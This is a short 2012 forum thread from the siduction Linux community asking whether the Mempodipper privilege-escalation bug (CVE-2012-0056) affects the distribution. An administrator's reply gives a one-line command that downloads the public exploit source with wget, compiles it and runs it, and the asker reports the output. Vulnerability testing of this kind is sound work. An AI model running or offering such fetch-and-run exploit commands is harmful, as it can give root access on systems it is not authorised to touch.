Welcome, Guest. Please login or register.
Did you miss your activation email?

Author Topic: [EN] Does this affect siduction?  (Read 2182 times)

hinto

  • Guest
[EN] Does this affect siduction?
« on: 2012/01/24, 21:34:56 »
Hi guys,
Does this affect siduction?

Linux Local Privilege Escalation via SUID /proc/pid/mem Write
http://blog.zx2c4.com/749

-Hinto

Offline towo

  • Administrator
  • User
  • *****
  • Posts: 2.938
RE: Does this affect siduction?
« Reply #1 on: 2012/01/24, 21:40:00 »
test it:
Code: [Select]

wget -O mempodipper.c 'http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c?h=fedora';gcc -o mempodipper mempodipper.c;./mempodipper
Ich gehe nicht zum Karneval, ich verleihe nur manchmal mein Gesicht.

hinto

  • Guest
RE: Does this affect siduction?
« Reply #2 on: 2012/01/24, 21:44:40 »
I assume not, since I don't get a prompt after running the command to find out if I'm root.
Thanks for the info.
-H

hinto

  • Guest
RE: Does this affect siduction?
« Reply #3 on: 2012/01/24, 21:46:45 »
That is, it stops at:
  • Executing gpasswd with shellcode.